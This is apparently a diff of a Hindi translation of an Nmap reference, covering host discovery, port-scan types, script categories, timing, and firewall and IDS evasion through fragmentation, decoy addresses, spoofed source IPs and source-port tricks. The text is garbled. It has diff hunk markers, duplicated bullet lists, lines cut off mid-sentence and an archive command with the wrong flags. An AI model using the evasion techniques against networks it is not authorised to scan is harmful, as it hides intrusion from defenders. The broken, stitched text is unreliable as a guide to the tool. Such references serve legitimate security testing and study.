* **`-sn`** : **कोई पोर्ट स्कैन नहीं**। अन्वेषण चरण पूरा करने के बाद, यह पोर्ट स्कैन नहीं करता है। यह अनुमानित रूप से छिपकली, और एक छोटे नेटवर्क स्कैन करने देता है। विशेषाधिकारों के साथ यह 80 को ACK (-PA) भेजता है, 443 को SYN(-PS) भेजता है और एक इको अनुरोध और एक समयचिह्न अनुरोध भेजता है, बिना विशेषाधिकारों के यह हमेशा कनेक्शन पूरा करता है। यदि लक्ष्य नेटवर्क है, तो यह केवल ARP(-PR) का उपयोग करता है। यदि इसे किसी अन्य विकल्प के साथ उपयोग किया जाता है, तो केवल अन्य विकल्प के पैकेट ड्रॉप होते हैं।
|
||||
* **`-PR`**: **पिंग ARP**। यह डिफ़ॉल्ट रूप से हमारे नेटवर्क में कंप्यूटरों का विश्लेषण करते समय उपयोग किया जाता है, यह पिंग का उपयोग करने से तेज है। यदि आप ARP पैकेट का उपयोग नहीं करना चाहते हैं तो `--send-ip` का उपयोग करें।
|
||||
* **`-PS <ports>`**: यह SYN पैकेट भेजता है जिसे यदि यह SYN/ACK के साथ जवाब देता है तो खुला है (जिसे यह RST के साथ जवाब देता है ताकि कनेक्शन समाप्त न हो), यदि यह RST के साथ जवाब देता है तो बंद है और यदि यह जवाब नहीं देता है तो अगम्य है। यदि विशेषाधिकार नहीं हैं, तो सम्पूर्ण कनेक्शन स्वचालित रूप से उपयोग किया जाता है। यदि कोई पोर्ट नहीं दिया गया है, तो यह 80 पर फेंक देता है।
|
||||
* **`-PS <ports>`**: यह SYN पैकेट भेजता है जिसे यदि यह SYN/ACK के साथ जवाब देता है तो खुला है (जिसे यह RST के साथ जवाब देता है ताकि कनेक्शन समाप्त न हो), यदि यह RST के साथ जवाब देता है तो बंद है और यदि यह जवाब नहीं देता है तो अगम्य है। यदि विशेषाधिकार नहीं हैं, तो समूचा कनेक्शन स्वचालित रूप से उपयोग किया जाता है। यदि कोई पोर्ट नहीं दिया गया है, तो यह 80 पर फेंक देता है।
|
||||
* **`-PA <ports>`**: पिछले वाले की तरह लेकिन ACK के साथ, दोनों को मिलाकर बेहतर परिणाम मिलते हैं।
|
||||
* **`-PU <ports>`**: उद्देश्य उल्टा है, यह बंद होने की उम्मीद है। कुछ फ़ायरवॉल केवल TCP कनेक्शन की जांच करते हैं। यदि यह बंद है तो यह पोर्ट अप्राप्य है, यदि यह किसी अन्य icmp के साथ जवाब देता है या जवाब नहीं देता है तो यह गंतव्य अप्राप्य छोड़ दिया जाता है।
|
||||
* **`-PE, -PP, -PM`** : ICMP PINGS: इको प्रतिद्वंद्वी, समयचिह्न और एड्रेसमास्क। यह लॉन्च किया जाता है ताकि पता चले कि लक्ष्य सक्रिय है या नहीं।
|
||||
* **`-PY<ports>`**: 80 के लिए SCTP INIT प्रोब भेजता है, INIT-ACK(खुला) या ABORT(बंद) या कुछ नहीं या ICMP अप्राप्य(निष्क्रिय) जवाब दिया जा सकता है।
|
||||
* **`-PO <protocols>`**: हेडर में एक प्रोटोकॉल निर्दिष्ट किया जाता है, डिफ़ॉल्ट रूप से 1(ICMP), 2(IGMP) और 4(Encap IP)। ICMP, IGMP, TCP (6) और UDP (17) प्रोटोकॉल के लिए प्रोटोकॉल हेडर भेजे जाते हैं, बाकी के लिए केवल IP हेडर भेजा जाता है। इसका उद्देश्य है कि हेडर्स की गलत बनावट के कारण प्रोटोकॉल अप्राप्य या उसी प्रोटोकॉल के जवाब दिए जाते हैं ताकि पता चले कि यह ऊपर है या नहीं।
|
||||
* **`-PU <ports>`**: उद्देश्य उल्टा है, जो बंद होने की उम्मीद है। कुछ फ़ायरवॉल केवल TCP कनेक्शन की जांच करते हैं। यदि यह बंद है तो यह पोर्ट अप्राप्त है, यदि यह किसी अन्य icmp के साथ जवाब देता है या जवाब नहीं देता है तो यह गंतव्य अप्राप्त है।
|
||||
* **`-PE, -PP, -PM`** : ICMP PINGS: इको प्रतिद्वंद्वीकरण, समयचिह्न और एड्रेसमास्क। यह लॉन्च किए जाते हैं ताकि पता चले कि लक्ष्य सक्रिय है या नहीं।
|
||||
* **`-PY<ports>`**: 80 के लिए SCTP INIT प्रोब भेजता है, INIT-ACK(खुला) या ABORT(बंद) या कुछ नहीं या ICMP अप्राप्त(निष्क्रिय) जवाब दिया जा सकता है।
|
||||
* **`-PO <protocols>`**: हेडर में एक प्रोटोकॉल दिखाया जाता है, डिफ़ॉल्ट रूप से 1(ICMP), 2(IGMP) और 4(Encap IP)। ICMP, IGMP, TCP (6) और UDP (17) प्रोटोकॉल के लिए प्रोटोकॉल हेडर भेजे जाते हैं, बाकी के लिए केवल IP हेडर भेजा जाता है। इसका उद्देश्य यह है कि हेडर्स के गलत रूपांतरण के कारण प्रोटोकॉल अप्राप्त या उसी प्रोटोकॉल के जवाब दिए जाते हैं ताकि पता चले कि यह ऊपर है या नहीं।
|
||||
* **`-n`**: कोई DNS नहीं
|
||||
* **`-R`**: हमेशा DNS
|
||||
|
||||
### पोर्ट स्कैनिंग तकनीकें
|
||||
|
||||
* **`-sS`**: कनेक्शन को पूरा नहीं करता है इसलिए कोई पता नहीं छोड़ता, अगर उपयोग किया जा सकता है तो बहुत अच्छा है।(विशेषाधिकार) यह डिफ़ॉल्ट रूप से उपयोग किया जाता है।
|
||||
* **`-sT`**: कनेक्शन पूरा करता है, इसलिए यह पता छोड़ता है, लेकिन यह सुनिश्चित करने के लिए उपयोग किया जा सकता है। डिफ़ॉल्ट रूप से विशेषाधिकार नहीं है।
|
||||
* **`-sU`**: धीमा, UDP के लिए। अधिकांश: DNS(53), SNMP(161,162), DHCP(67 और 68), (-sU53,161,162,67,68): खुला(जवाब), बंद(पोर्ट अप्राप्य), फ़िल्टर(अन्य ICMP), खुला/फ़िल्टर(कुछ नहीं)। खुला/फ़िल्टर के मामले में, -sV न्यूनतम संभावनाओं को जानने के लिए कई अनुरोध भेजता है और nmap समर्थित किसी भी संस्करण का पता लगा सकता है और वास्तविक स्थिति का पता लगा सकता है। यह समय को बहुत बढ़ा देता है।
|
||||
* **`-sS`**: कनेक्शन को पूरा नहीं करता है इसलिए कोई पता नहीं छोड़ता, अगर इस्तेमाल किया जा सकता है तो बहुत अच्छा है।(विशेषाधिकार) यह डिफ़ॉल्ट रूप से उपयोग किया जाता है।
|
||||
* **`-sT`**: कनेक्शन पूरा करता है, इसलिए यह पता छोड़ता है, लेकिन यह सुनिश्चित करने के लिए उपयोग किया जा सकता है। डिफ़ॉल्ट रूप से विशेषाधिकारों के बिना।
|
||||
* **`-sU`**: धीमा, UDP के लिए। अधिकांश: DNS(53), SNMP(161,162), DHCP(67 और 68), (-sU53,161,162,67,68): खुला(जवाब), बंद(पोर्ट अप्राप्त), फ़िल्टर(अन्य ICMP), खुला/फ़िल्टर(कुछ नहीं)। खुला/फ़िल्टर के मामले में, -sV न्यूनतम संभावनाओं को खोजने के लिए कई अनुरोध भेजता है और nmap समर्थित किसी भी संस्करण का पता लगा सकता है और वास्तविक स्थिति का पता लगा सकता है। यह समय को बहुत बढ़ा देता है।
|
||||
* **`-sY`**: SCTP प्रोटोकॉल कनेक्शन स्थापित करने में विफल होता है, इसलिए कोई लॉग नहीं होता, -PY की तरह काम करता है
|
||||
* **`-sN,-sX,-sF`:** नल, फिन, ख्रिसमस, वे कुछ फ़ायरवॉल में प्रवेश कर सकते हैं और जानकारी निकाल सकते हैं। यह उस तथ्य पर आधारित है कि मानक अनुरूप मशीनें उन सभी अनुरोधों के साथ RST देना चाहिए जिनमें SYN, RST या ACK लैग उठाए नहीं हैं: खुला/फ़िल्टर(कुछ नहीं), बंद(RST), फ़िल्टर(अन्य ICMP)। विंडोज, सिस्को, बीएसडीआई और ओएस/400 पर अविश्वसनीय है। यूनिक्स पर हां।
|
||||
* **`-sM`**: मैमन स्कैन: FIN और ACK फ्लैग भेजता है, वर्तमान में सभी को बंद के रूप में लौटाएगा।
|
||||
* **`-sA, sW`**: ACK और विंडो, फ़ायरवॉल का पता लगाने के लिए उपयोग किया जाता है, यह जानने के लिए कि पोर्ट फ़िल्टर हैं या नहीं। -sW खुला/बंद के बीच भेद करता है क्योंकि खुले वाले अलग विंडो मान देते हैं: खुला (जवाब विंडो 0 के अलावा), बंद (बंद विंडो = 0), फ़िल्टर (ICMP अप
|
||||
* **`-sN,-sX,-sF`:** नल, फिन, क्रिसमस, वे कुछ फ़ायरवॉल में प्रवेश कर सकते हैं और जानकारी निकाल सकते हैं। यह उस तथ्य पर आधारित है कि मानक अनुरूप मशीनें उन सभी अनुरोधों के साथ RST के साथ प्रतिक्रिया करना चाहिए जिनमें SYN, RST या ACK लैग उठाए गए हैं: खुला/फ़िल्टर(कुछ नहीं), बंद(RST), फ़िल्टर(अन्य ICMP)। विंडोज, सिस्को, बीएसडीआई और ओएस/400 पर अविश्वसनीय है। यूनिक्स पर हां।
|
||||
* **`-sM`**: मैमन स्कैन: FIN और ACK लैग भेजता है, बीएसडी के लिए उपयोग किया जाता है, वर्तमान में सभी को बंद ही वापस करेगा।
|
||||
* **`-sA, sW`**: ACK और विंडो, फ़ायरवॉल का पता लगाने के लिए उपयोग किया जाता है, यह जानने के लिए कि पोर्ट फ़िल्टर हैं या नहीं। -sW खुला/बंद के बीच भेद करता है क्योंकि खुले वाले अलग विंडो मान देते हैं: खुला (जवाब में विंडो 0 के अलावा RST), बंद (RST विंडो = 0), फ़िल्टर (ICMP
|
||||
**--osscan-guess** जब ऑपरेटिंग सिस्टम की पहचान पूरी तरह से सही नहीं होती है तो यह अधिक प्रयास करता है।
|
||||
|
||||
**Scripts**
|
||||
**स्क्रिप्ट्स**
|
||||
|
||||
\--script _\<नाम>_|_\<श्रेणी>_|_\<निर्देशिका>_|_\<अभिव्यक्ति>_\[,...]
|
||||
|
||||
|
@ -64,21 +65,21 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
|
|||
|
||||
उपलब्ध श्रेणियाँ हैं: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, और vuln
|
||||
|
||||
* **Auth:** प्रमाणीकरण के लिए उपलब्ध सभी अपने _स्क्रिप्ट_ को चलाता है
|
||||
* **Default:** उपकरण के डिफ़ॉल्ट बुनियादी _स्क्रिप्ट_ को चलाता है
|
||||
* **Discovery:** _target_ या पीड़िता से जानकारी प्राप्त करता है
|
||||
* **External:** बाह्य संसाधनों का उपयोग करने के लिए _स्क्रिप्ट_
|
||||
* **Intrusive:** पीड़ित या _target_ के लिए अभिमानी माने जाने वाले _स्क्रिप्ट_ का उपयोग करता है
|
||||
* **Malware:** क्या खुले हैं कोड या _backdoors_ (पिछले दरवाजे) द्वारा कोई जुड़ाव है या नहीं जांचता है
|
||||
* **Safe:** अभिमानी नहीं हैं _स्क्रिप्ट_ को चलाता है
|
||||
* **Vuln:** सबसे अधिक जानी जाने वाली कमियों का पता लगाता है
|
||||
* **All:** उपलब्ध NSE विस्तार वाले सभी _स्क्रिप्ट_ को चलाता है
|
||||
* **Auth:** प्रमाणीकरण के लिए उपलब्ध सभी अपने स्क्रिप्ट्स को चलाता है
|
||||
* **Default:** उपकरण के डिफ़ॉल्ट बुनियादी स्क्रिप्ट्स को चलाता है
|
||||
* **Discovery:** लक्ष्य या पीड़िता से जानकारी प्राप्त करता है
|
||||
* **External:** बाहरी संसाधनों का उपयोग करने के लिए स्क्रिप्ट
|
||||
* **Intrusive:** उस्ताद या लक्ष्य के लिए अभिव्यक्ति माने जाने वाले स्क्रिप्ट्स का उपयोग करता है
|
||||
* **Malware:** क्या खुले हैं कोड या अवैध द्वार (बैकडोअर्स) द्वारा
|
||||
* **Safe:** अभिव्यक्ति नहीं करने वाले स्क्रिप्ट्स को चलाता है
|
||||
* **Vuln:** सबसे ज्यादा जानी जाने वाली वुलनरेबिलिटी का पता लगाता है
|
||||
* **All:** उपलब्ध NSE विस्तार वाले सभी स्क्रिप्ट्स को चलाता है
|
||||
|
||||
स्क्रिप्ट खोजने के लिए:
|
||||
स्क्रिप्ट्स खोजने के लिए:
|
||||
|
||||
**nmap --script-help="http-\*" -> जो http- से शुरू होते हैं**
|
||||
|
||||
**nmap --script-help="not intrusive" -> उनमें से सभी जो नहीं हैं**
|
||||
**nmap --script-help="not intrusive" -> उन सभी को छोड़कर**
|
||||
|
||||
**nmap --script-help="default or safe" -> जो एक में हैं या दूसरे में या दोनों में**
|
||||
|
||||
|
@ -96,37 +97,37 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
|
|||
|
||||
\--script-updatedb
|
||||
|
||||
**स्क्रिप्ट का उपयोग करने के लिए केवल नाम दर्ज करें: namp --script नाम_देना_है\_स्क्रिप्ट लक्ष्य** --> स्क्रिप्ट और स्कैनर दोनों को चलाने के लिए स्क्रिप्ट दर्ज करने पर, इसलिए स्कैनर के विकल्प भी दर्ज किए जा सकते हैं, हम **“safe=1”** जोड़ सकते हैं ताकि केवल सुरक्षित वाले ही चलें।
|
||||
**स्क्रिप्ट का उपयोग करने के लिए केवल नाम दर्ज करें: namp --script नाम_दर्ज_करें लक्ष्य** --> स्क्रिप्ट और स्कैनर दोनों को चलाने के लिए स्क्रिप्ट दर्ज करने पर, इसलिए स्कैनर के विकल्प भी जोड़ सकते हैं, हम **“safe=1”** जोड़ सकते हैं ताकि केवल सुरक्षित वाले ही चलें।
|
||||
|
||||
**समय नियंत्रण**
|
||||
|
||||
**Nmap सेकंड, मिनट, ms में समय को संशोधित कर सकता है:** --host-timeout arguments 900000ms, 900, 900s, और 15m सभी एक ही चीज करते हैं।
|
||||
|
||||
Nmap होस्ट की कुल संख्या को समूहों में विभाजित करता है और उन समूहों का विश्लेषण ब्लॉक में करता है, जिसका मतलब है कि जब तक सभी विश्लेषित नहीं हो जाते हैं, तब तक यह अगले ब्लॉक पर नहीं जाता है (और उपयोगकर्ता को तब तक कोई अद्यतन नहीं मिलता है जब तक ब्लॉक का विश्लेषण नहीं हो जाता है) इस तरह, nmap के लिए बड़े समूहों का उपयोग करना अधिक उपयुक्त है। डिफ़ॉल्ट रूप से कक्षा C में 256 का उपयोग करता है।
|
||||
Nmap होस्ट की कुल संख्या को समूहों में विभाजित करता है और उन समूहों का विश्लेषण ब्लॉक में करता है, ताकि जब तक सभी विश्लेषित नहीं हो जाते हैं, तब तक अगले ब्लॉक पर नहीं जाता है (और उपयोगकर्ता को भी कोई अद्यतन नहीं मिलता है जब तक ब्लॉक का विश्लेषण नहीं हो जाता है) इस तरह, nmap के लिए बड़े समूहों का उपयोग करना अधिक उपयुक्त है। डिफ़ॉल्ट रूप से कक्षा C में 256 का उपयोग करता है।
|
||||
|
||||
इसे बदल सकते हैं\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (समानकालिक स्कैन समूह आकारों को समायोजित करें)
|
||||
|
||||
समानकालिक स्कैनरों की संख्या को नियंत्रित किया जा सकता है लेकिन यह बेहतर है कि न करें (nmpa में पहले से ही नेटवर्क की स्थिति के आधार पर स्वचालित नियंत्रण शामिल है): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
|
||||
समानकालिक स्कैनरों की संख्या को नियंत्रित किया जा सकता है लेकिन यह बेहतर है कि न करें (nmpa में नेटवर्क की स्थिति के आधार पर स्वचालित नियंत्रण शामिल है): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
|
||||
|
||||
हम rtt टाइमआउट को संशोधित कर सकते हैं, लेकिन आम तौर पर यह आवश्यक नहीं होता: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
|
||||
हम rtt टाइमआउट को संशोधित कर सकते हैं, लेकिन आम तौर पर आवश्यक नहीं होता: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
|
||||
|
||||
हम प्रयासों की संख्या को संशोधित कर सकते हैं:**--max-retries** _**\<numtries>**_
|
||||
|
||||
हम होस्ट के स्कैनिंग के समय को संशोधित कर सकते हैं: **--host-timeout** _**\<time>**_
|
||||
हम होस्ट के स्कैनिंग का समय संशोधित कर सकते हैं: **--host-timeout** _**\<time>**_
|
||||
|
||||
हम प्रत्येक परीक्षण के बीच का समय संशोधित कर सकते हैं ताकि धीमे चले: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
|
||||
हम प्रत्येक परीक्षण के बीच समय को धीमा करने के लिए समय को संशोधित कर सकते हैं: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
|
||||
|
||||
हम प्रति सेकंड पैकेट की संख्या को संशोधित कर सकते हैं: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
|
||||
|
||||
बहुत से पोर्ट फ़िल्टर या बंद होने के कारण बहुत देर तक जवाब नहीं देते, अगर हमें केवल खुले पोर्टों की जरुरत है, तो हम इसे तेज़ कर सकते हैं: **--defeat-rst-ratelimit**
|
||||
बहुत सारे पोर्ट फ़िल्टर या बंद होने पर बहुत समय लेते हैं, अगर हमें केवल खुले पोर्ट्स की जरूरत है तो हम तेजी से जा सकते हैं: **--defeat-rst-ratelimit**
|
||||
|
||||
nmap को कितना प्रबल बनाना चाहिए, इसे परिभाषित करने के लिए: -T paranoid|sneaky|polite|normal|aggressive|insane
|
||||
Nmap कितना प्रवेशनात्मक होना चाहिए यह निर्धारित करने के लिए: -T paranoid|sneaky|polite|normal|aggressive|insane
|
||||
|
||||
\-T (0-1)
|
||||
|
||||
\-T0 --> केवल एक पोर्ट की एक साथ स्कैनिंग की जाती है और अगले के लिए 5 मिनट तक इंतजार किया जाता है
|
||||
\-T0 --> केवल एक पोर्ट को एक साथ स्कैन किया जाता है और अगले के लिए 5 मिनट तक इंतजार किया जाता है
|
||||
|
||||
\-T1 और T2 --> बहुत समान हैं लेकिन केवल 15 और 0.4 सेकंड के बीच प्रत्येक परीक्षण का इंतजार करते हैं
|
||||
\-T1 और T2 --> बहुत समान हैं लेकिन प्रत्येक परीक्षण के बीच केवल 15 और 0.4 सेकंड का इंतजार करते हैं
|
||||
|
||||
\-T3 --> डिफ़ॉल्ट व्यवहार, समानकालिक में शामिल है
|
||||
|
||||
|
@ -134,50 +135,50 @@ nmap को कितना प्रबल बनाना चाहिए, इ
|
|||
|
||||
\-T5 --> --max-rtt-timeout 300ms --min-rtt-timeout 50ms --initial-rtt-timeout 250ms --max-retries 2 --host-timeout 15m --max-scan-delay 5ms
|
||||
|
||||
**Firewall/IDS**
|
||||
**फ़ायरवॉल/IDS**
|
||||
|
||||
पोर्टों को गुजारने नहीं देते और पैकेटों का विश्लेषण करते हैं।
|
||||
पोर्ट्स को गुजरने नहीं देते और पैकेट्स का विश्लेषण करते हैं।
|
||||
|
||||
**-f** पैकेटों को फ्रैगमेंट करने के लिए, डिफ़ॉल्ट रूप से वे 8 बाइट के बाद फ्रैगमेंट करते हैं, इस आकार को निर्दिष्ट करने के लिए हम ..mtu का उपयोग करते हैं (इसके साथ, -f का उपयोग न करें), ऑफ़सेट 8 के गुणक होना चाहिए। **संस्करण और स्क्रिप्ट के विश्लेषण फ्रैगमेंटेशन का समर्थन नहीं करते**
|
||||
**-f** पैकेट को फ्रैगमेंट करने के लिए, डिफ़ॉल्ट रूप से यह 8 बाइट के बाद फ्रैगमेंट करता है, इस आकार को निर्दिष्ट करने के लिए ..mtu का उपयोग करें (इसके साथ, -f का उपयोग न करें), ऑफ़सेट 8 के गुणक होना चाहिए। **संस्करण और स्क्रिप्ट के स्कैनर्स फ्रैगमेंटेशन का समर्थन नहीं करते**
|
||||
|
||||
**-D डेकॉय1,डेकॉय2,मैं** Nmap अन्य IP पतों के साथ स्कैनर भेजता है, जिसे मूल पते के रूप में छुपाता है। यदि आप में सूची में ME डालते हैं, तो nmap आपको वहाँ स्थानित करेगा, आपको पूरी तरह से मास्क करने के लिए अपने से पहले 5 या 6 डेकॉय को डालना बेहतर है। RND:\<संख्या> के साथ यादृच्छिक IP उत्पन्न किए जा सकते हैं। टीसीपी कनेक्शन के बिना संस्करण डिटेक्टर के साथ काम नहीं करते। यदि आप एक नेटवर्क के अंदर हैं, तो आपको सक्रिय IP पतों का उपयोग करना चाहिए, क्योंकि अन्यथा यह बहुत आसान हो जाएगा कि आप ही एकमात्र सक्रिय हैं।
|
||||
**-D डेकॉय1,डेकॉय2,मैं** Nmap अन्य IP पतों के साथ स्कैनर भेजता है, जैसे कि मूल पतों के रूप में, इस तरह आपको छुपाता है। यदि आप में सूची में ME डालते हैं, तो nmap आपको वहां स्थित करेगा, आपको पूरी तरह से मास्क करने के लिए अपने से पहले 5 या 6 डेकॉय डालना बेहतर है। RND:\<संख्या> के साथ यादृच्छिक IP उत्पन्न किए जा सकते हैं। टीसीपी कनेक्शन के बिना संस्करण डिटेक्टर के साथ काम नहीं करते। यदि आप एक नेटवर्क के अंदर हैं, तो सक्रिय IP का उपयोग करना उपयुक्त है, क्योंकि अन्यथा आसानी से पता लगाया जा सकता है कि आप ही एकमात्र सक्रिय हैं।
|
||||
|
||||
यादृच्छिक IP का उपयोग करने के लिए: nmap-D RND: 10 Ip_लक्ष्य
|
||||
|
||||
**-S IP** जब Nmap आपका IP पता नहीं पकड़ता है तो आपको इसे देना होगा। यहाँ एक और लक्ष्य जो उन्हें स्कैन कर रहा है, उसे लगाने के लिए भी क
|
||||
**--proxies** _**\<कॉमा-सेपरेटेड सूची प्रॉक्सी URL>**_ प्रॉक्सी का उपयोग करने के लिए, कभी-कभी एक प्रॉक्सी उतने खुले कनेक्शन नहीं रखता जितने nmap चाहता है, इसलिए पैरालेलिज़्म को संशोधित करना होगा: --max-parallelism
|
||||
**-S IP** जब Nmap आपका IP पता नहीं लेता है तो आपको इसे देना पड़ता है। इसका उपयोग उन्हें यह लगाने के लिए भी किया जा सकता है कि कोई अन्य लक्ष्य उन्हें स्कैन कर रहा है
|
||||
**--proxies** _**\<Comma-separated list of proxy URLs>**_ प्रॉक्सी का उपयोग करने के लिए, कभी-कभी एक प्रॉक्सी उस संख्या की तरह खुली रखता है जितनी nmap चाहता है, इसलिए हमें पैरालेलिज़्म को संशोधित करना होगा: --max-parallelism
|
||||
|
||||
**-sP** ARP के माध्यम से होस्ट का पता लगाने के लिए जो नेटवर्क में हैं जिसमें हम हैं
|
||||
**-sP** हमारे ARP के माध्यम से नेटवर्क में होस्ट का खोज करने के लिए
|
||||
|
||||
बहुत से व्यवस्थापक एक नियम बनाते हैं जो फ़ायरवॉल में एक विशेष पोर्ट से आने वाले सभी पैकेटों को पारित करने देता है (जैसे 20, 53 और 67), हम nmap को यह कह सकते हैं कि हमारे पैकेट उन पोर्ट्स से भेजें: **nmap --source-port 53 Ip**
|
||||
बहुत से व्यवस्थापक एक फ़ायरवॉल में एक नियम बनाते हैं जो एक विशेष पोर्ट से आने वाले सभी पैकेटों को पारित करने देता है (जैसे 20, 53 और 67), हम nmap को यह कह सकते हैं कि हमारे पैकेट उन पोर्ट से भेजें: **nmap --source-port 53 Ip**
|
||||
|
||||
**आउटपुट**
|
||||
|
||||
**-oN फ़ाइल** सामान्य आउटपुट
|
||||
**-oN file** सामान्य आउटपुट
|
||||
|
||||
**-oX फ़ाइल** XML आउटपुट
|
||||
**-oX file** XML आउटपुट
|
||||
|
||||
**-oS फ़ाइल** स्क्रिप्ट किडीज का आउटपुट
|
||||
**-oS file** स्क्रिप्ट किडीज का आउटपुट
|
||||
|
||||
**-oG फ़ाइल** grepable आउटपुट
|
||||
**-oG file** grepable आउटपुट
|
||||
|
||||
**-oA फ़ाइल** -oS को छोड़कर सभी
|
||||
**-oA file** -oS को छोड़कर सभी
|
||||
|
||||
**-v स्तर** वर्बोसिटी
|
||||
**-v level** वर्बोसिटी
|
||||
|
||||
**-d स्तर** डीबगिंग
|
||||
**-d level** डीबगिंग
|
||||
|
||||
**--reason** होस्ट और स्थिति का कारण
|
||||
|
||||
**--stats-every समय** हर इस समय हमें बताता है कि कैसे जा रहा है
|
||||
**--stats-every time** हर इस समय के बाद हमें बताता है कि कैसे जा रहा है
|
||||
|
||||
**--packet-trace** देखने के लिए कि कौन से पैकेट निकल रहे हैं, फ़िल्टर जैसे निर्दिष्ट किए जा सकते हैं: --version-trace या --script-trace
|
||||
**--packet-trace** देखने के लिए कि कौन से पैकेट निकल रहे हैं, हम फ़िल्टर जैसे निर्दिष्ट कर सकते हैं: --version-trace या --script-trace
|
||||
|
||||
**--open** खुले, खुले|फ़िल्टर किए गए और अफ़िल्टर को दिखाता है
|
||||
**--open** खुले हुए, खुले हुए|फ़िल्टर किए गए और अफ़िल्टर को दिखाता है
|
||||
|
||||
**--resume फ़ाइल** एक सारांश निकालता है
|
||||
**--resume file** एक सारांश निकालता है
|
||||
|
||||
**विविध**
|
||||
**मिसेलेनियस**
|
||||
|
||||
**-6** ipv6 की अनुमति देता है
|
||||
|
||||
|
@ -185,7 +186,7 @@ nmap को कितना प्रबल बनाना चाहिए, इ
|
|||
|
||||
**रन टाइम**
|
||||
|
||||
Nmap चलते समय हम विकल्प बदल सकते हैं:
|
||||
नमैप चलते समय हम विकल्प बदल सकते हैं:
|
||||
|
||||
v / V वर्बोसिटी स्तर बढ़ाएं / कम करें
|
||||
|
||||
|
@ -197,7 +198,7 @@ p / P पैकेट ट्रेसिंग को चालू / बंद
|
|||
|
||||
**Vulscan**
|
||||
|
||||
Nmap का स्क्रिप्ट जो एक ऑफ़लाइन डेटाबेस में प्राप्त सेवाओं के संस्करणों को देखता है (जो अन्य महत्वपूर्ण से डाउनलोड किया जाता है) और संभावित भेदभाव देता है
|
||||
नमैप का स्क्रिप्ट जो एक ऑफ़लाइन डेटाबेस में प्राप्त सेवाओं के संस्करणों को देखता है (जो अन्य महत्वपूर्ण से डाउनलोड किया जाता है) और संभावित भेदभाव देता है
|
||||
|
||||
उस डेटाबेस का उपयोग करता है:
|
||||
|
||||
|
@ -210,7 +211,7 @@ Nmap का स्क्रिप्ट जो एक ऑफ़लाइन ड
|
|||
7. Exploitdb.csv | [http://www.exploit-db.com](http://www.exploit-db.com/)
|
||||
8. Openvas.csv | [http://www.openvas.org](http://www.openvas.org/)
|
||||
|
||||
इसे डाउनलोड और Nmap फ़ोल्डर में स्थापित करने के लिए:
|
||||
इसे डाउनलोड और स्थापित करने के लिए Nmap फ़ोल्डर में:
|
||||
|
||||
wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar.gz && tar -czvf nmap\_nse\_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/
|
||||
|
||||
|
@ -222,28 +223,10 @@ wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar
|
|||
|
||||
एक विशिष्ट डेटाबेस का उपयोग करने के लिए: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR
|
||||
|
||||
## Nmap सेवा स्कैन को तेज़ करें x16
|
||||
## Nmap सेवा स्कैन को 16 गुणा तेज करें
|
||||
|
||||
इस [**पोस्ट**](https://joshua.hu/nmap-speedup-service-scanning-16x) के अनुसार, आप nmap सेवा विश्लेषण की गति बढ़ा सकते हैं जिसमें आपको सभी **`totalwaitms`** मानों को **300** और **`tcpwrappedms`** को **200** में संशोधित करना होगा।
|
||||
इस [**पोस्ट**](https://joshua.hu/nmap-speedup-service-scanning-16x) के अनुसार, आप नमैप सेवा विश्लेषण को तेज कर सकते हैं जिसके लिए आपको सभी **`totalwaitms`** मानों को **`/usr/share/nmap/nmap-service-probes`** में **300** और **`tcpwrappedms`** को **200** में संशोधित करना होगा।
|
||||
|
||||
इसके अतिरिक्त, जो प्रोब्स का विशेष रूप से परिभाषित **`servicewaitms`** नहीं है, वे एक डिफ़ॉल्ट मान **`5000`** का उपयोग करते हैं। इसलिए, हम इन प्रोब्स में मान जोड़ सकते हैं, या हम **nmap को कंपाइल** कर सकते हैं और [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79) में डिफ़ॉल्ट मान बदल सकते हैं।
|
||||
इसके अतिरिक्त, जो प्रोब्स का विशेष रूप से परिभाषित **`servicewaitms`** नहीं है, वे एक डिफ़ॉल्ट मान **`5000`** का उपयोग करते हैं। इसलिए, हम इन प्रोब्स में मान जोड़ सकते हैं, या हम **नमैप को कंपाइल** कर सकते हैं और [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79) में डिफ़ॉल्ट मान को बदल सकते हैं।
|
||||
|
||||
अगर आप चाहते हैं कि **`totalwaitms`** और **`tcpwrappedms`** के मानों को `/usr/share/nmap/nmap-service-probes` फ़ाइल में किसी भी प्रकार से न बदलें, तो आप [पार्सिंग कोड](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) को संपादित कर सकते हैं ताकि `nmap-service-probes` फ़ाइल में ये मान पूरी तरह से नजरअंदाज किए जाएं।
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
